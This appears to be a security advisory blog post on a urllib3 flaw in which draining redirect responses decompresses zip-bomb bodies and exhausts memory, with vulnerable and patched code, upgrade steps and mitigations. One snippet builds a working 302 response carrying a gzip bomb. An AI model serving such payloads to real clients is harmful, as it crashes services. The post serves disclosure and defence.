Feb 23, 2026 · 6 min read
urllib3 < 2.6.3 automatically decompresses response bodies even when merely trying to 'drain' a connection for a redirect. Attacker sends a 302 Found with a 'zip bomb' body -> Client RAM evaporates -> Service crashes.
A high-severity logic flaw in urllib3, the Python ecosystem's most popular HTTP client, allows for Denial of Service via decompression bombs. When handling HTTP redirects in streaming mode, the library inadvertently decompressed the response body of the redirect (3xx) before discarding it. This allows an attacker to send a small, highly compressed payload (like a zip bomb) inside a redirect response, forcing the client to expand it into gigabytes of data in memory, crashing the application instantly.
If you write Python, you use urllib3. You might not know it—you probably use requests—but urllib3 is the engine room. It handles the dirty work: connection pooling, SSL verification, and socket management. It is the plumbing of the Python internet.
One of the most useful features of this plumbing is preload_content=False (or stream=True in Requests). This tells the library: "Hey, I'm expecting a big file. Don't download it all at once. Let me sip it byte by byte." It's a safety mechanism, designed specifically to prevent your memory from exploding when fetching large datasets.
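To make the sipping concrete, here is a minimal, dependency-free sketch of the same idea using the standard library's http.client against a throwaway local server. The handler name, body size, and chunk size are invented for illustration; urllib3's preload_content=False gives you the equivalent chunked reads via response.stream().

```python
import http.client
import http.server
import threading

class BigFileHandler(http.server.BaseHTTPRequestHandler):
    """Serves a 1 MiB body so the client has something worth streaming."""
    def do_GET(self):
        body = b"x" * (1 << 20)
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass

server = http.server.HTTPServer(("127.0.0.1", 0), BigFileHandler)
threading.Thread(target=server.serve_forever, daemon=True).start()

conn = http.client.HTTPConnection("127.0.0.1", server.server_port)
conn.request("GET", "/big-file")
response = conn.getresponse()

# Sip the body 64 KiB at a time instead of loading it all at once.
total = 0
while chunk := response.read(65536):
    total += len(chunk)

print(total)  # 1048576 -- and never more than 64 KiB resident at a time
server.shutdown()
```

The point is the loop: peak memory is bounded by the chunk size you choose, not by whatever the server decides to send.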
But CVE-2026-21441 proves that even safety mechanisms can be weaponized. It turns out that while urllib3 was busy protecting you from the final destination's payload, it was completely exposing your jugular to the journey there. Specifically, the redirect. It's a classic case of the "confused deputy"—the library tries to be helpful by cleaning up a socket, and in doing so, it commits suicide.
To understand this bug, you have to understand HTTP Keep-Alive. When a client makes a request and receives a response, it wants to reuse that TCP connection for the next request to save overhead. But you can't reuse a socket if there is still leftover data sitting in the pipe from the previous response. You have to "drain" it.
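You can watch this constraint in action with the standard library alone: on a keep-alive connection, http.client refuses to hand you a second response until the first body has been fully read off the socket. A minimal sketch (server, paths, and bodies invented for illustration):

```python
import http.client
import http.server
import threading

class EchoHandler(http.server.BaseHTTPRequestHandler):
    protocol_version = "HTTP/1.1"  # enables keep-alive on the server side

    def do_GET(self):
        body = f"hello {self.path}".encode()
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass

server = http.server.HTTPServer(("127.0.0.1", 0), EchoHandler)
threading.Thread(target=server.serve_forever, daemon=True).start()

conn = http.client.HTTPConnection("127.0.0.1", server.server_port)
conn.request("GET", "/first")
first = conn.getresponse()

# Send a second request, then try to fetch its response while the
# first body is still sitting unread in the pipe:
conn.request("GET", "/second")
needs_drain = False
try:
    conn.getresponse()
except http.client.ResponseNotReady:
    needs_drain = True  # the socket is "dirty" until we drain it

first.read()  # drain the leftover bytes; the connection is clean again
data = conn.getresponse().read()
print(needs_drain, data)  # True b'hello /second'
server.shutdown()
```

urllib3 automates exactly that first.read() step for you, which is where this story goes wrong.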
In urllib3, when a server responds with a redirect (like a 302 Found), the library decides to follow it. But before it can send the request to the new location, it must scrub the socket clean of the old response (the 302 body). Enter the drain_conn() method.
Here is the logic failure: drain_conn() was implemented by simply calling self.read(). The developers assumed read() would just pull bytes off the wire and toss them into the void.
However, urllib3 is helpful. Too helpful. If the server sends a Content-Encoding: gzip header, self.read() automatically triggers the decompression logic. It doesn't care that you are just trying to flush the toilet; it inspects the contents anyway. The library sees a compressed stream, thinks "I bet the user wants this inflated," and expands it into RAM. All of it. All at once.
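The asymmetry here is easy to demonstrate with the standard library alone. A body of zeros compresses at roughly 1000:1 under DEFLATE (the exact ratio varies), so ~100 KB on the wire inflates to 100 MB the moment something naively decompresses it:

```python
import zlib

# 100 MB of zeros compresses down to roughly 100 KB under DEFLATE.
original_size = 100 * 1024 * 1024
compressed = zlib.compress(b"\x00" * original_size, level=9)

print(f"wire size: {len(compressed):,} bytes")

# What an auto-decoding read() effectively does during a "drain":
inflated = zlib.decompress(compressed)
print(f"in memory: {len(inflated):,} bytes")  # 104,857,600 bytes in RAM
```

Scale the input up and the victim's memory bill grows linearly while the attacker's bandwidth bill barely moves.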
The vulnerability lived in src/urllib3/response.py. It's a masterclass in how a single line of innocuous code can bring down a production cluster.
Here is the vulnerable implementation of the drain function. Notice the lack of parameters passed to read():
```python
# VULNERABLE CODE (urllib3 < 2.6.3)
def drain_conn(self) -> None:
    try:
        # The fatal flaw: read() defaults to decode_content=True
        # if a compression header is present.
        self.read()
    except (HTTPError, OSError, BaseSSLError, HTTPException):
        pass
```

When read() is called without arguments, it checks the Content-Encoding header. If it sees gzip, deflate, br, or zstd, it initializes the decompressor and runs the stream through it.
Here is the fix implemented in version 2.6.3. It explicitly tells the read method: "Do not decode this unless we have already started decoding it."
```python
# PATCHED CODE (urllib3 >= 2.6.3)
def drain_conn(self) -> None:
    try:
        self.read(
            # The fix: explicitly forbid decoding during the drain
            # unless the user had already started reading it.
            decode_content=self._has_decoded_content,
        )
    except (HTTPError, OSError, BaseSSLError, HTTPException):
        pass
```

This simple boolean flag, decode_content, makes the difference between a healthy service and an OOM (Out of Memory) crash.
To exploit this, an attacker doesn't need complex memory corruption or ROP chains. They just need a basic understanding of compression algorithms. The goal is Asymmetric Resource Exhaustion: send a few kilobytes of data that the victim expands into gigabytes.
The attack flow is simple. The victim application makes a request to an attacker-controlled (or compromised) server, which responds with a 302 Found status code. Crucially, the attacker adds Content-Encoding: gzip and a body consisting of a "zip bomb" (e.g., a long stream of zeros compressed via DEFLATE).

Because the expansion happens inside the library's internal "cleanup" routine, the application developer's safeguards (like reading chunks of 1024 bytes) are ignored. The library tries to drain the entire redirect body before handing control back to the application.
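To see how little the attacker actually has to send, here is a hedged sketch that assembles the raw bytes of such a malicious redirect response. The Location value and the 50 MB bomb size are arbitrary choices for illustration:

```python
import gzip

# The "bomb": 50 MB of zeros, gzip-compressed down to a few tens of KB.
plaintext_size = 50 * 1024 * 1024
bomb = gzip.compress(b"\x00" * plaintext_size, compresslevel=9)

# A complete, tiny 302 response carrying the compressed payload.
response = (
    b"HTTP/1.1 302 Found\r\n"
    b"Location: http://example.com/next\r\n"
    b"Content-Encoding: gzip\r\n"
    b"Content-Length: " + str(len(bomb)).encode() + b"\r\n"
    b"\r\n"
) + bomb

print(f"attacker sends {len(response):,} bytes; "
      f"victim inflates {plaintext_size:,} bytes during the drain")
```

A vulnerable client never even surfaces this response to application code: the expansion happens while it is "tidying up" on the way to the Location target.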
This vulnerability is particularly nasty because of where urllib3 sits in the ecosystem. It is the bedrock of Python automation.
This is a Denial of Service (DoS) vulnerability. While it doesn't offer Remote Code Execution (RCE) directly, the operational impact is massive. A single response from a malicious server can take down a worker process, pinning the CPU at 100% and consuming RAM until the OS kills it.
The remediation is straightforward, but the urgency is high given the ubiquity of the library.
Upgrade urllib3 to version 2.6.3 or higher. This version was released on January 7, 2026.
```shell
pip install --upgrade urllib3
# OR if you use requests
pip install --upgrade requests
```

> [!NOTE]
> Ensure you check your transitive dependencies. Even if your direct code doesn't import urllib3, your other libraries likely do.
If you cannot patch immediately, you can mitigate this by disabling automatic redirects in your HTTP calls. This forces your application to handle the 3xx response manually, where you can choose to discard the body without reading it.
```python
import urllib3

# Mitigation: Disable automatic redirects
http = urllib3.PoolManager()
response = http.request('GET', 'http://untrusted-source.com', redirect=False)
```

While difficult to detect at the network layer (since the payload is valid compressed data), WAFs that perform SSL termination and inspection can be configured to block responses with unusually high compression ratios, though this is computationally expensive.
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H

| Product | Affected Versions | Fixed Version |
|---|---|---|
| urllib3 | >= 1.22, < 2.6.3 | 2.6.3 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-409 (Improper Handling of Highly Compressed Data) |
| CVSS v4.0 | 8.9 (High) |
| Attack Vector | Network (Response to Outbound Request) |
| Affected Component | urllib3.response.drain_conn |
| Privileges Required | None |
| Exploit Status | PoC Available |
The software handles a compressed data bundle but does not strictly limit the size of the uncompressed data, allowing for resource exhaustion.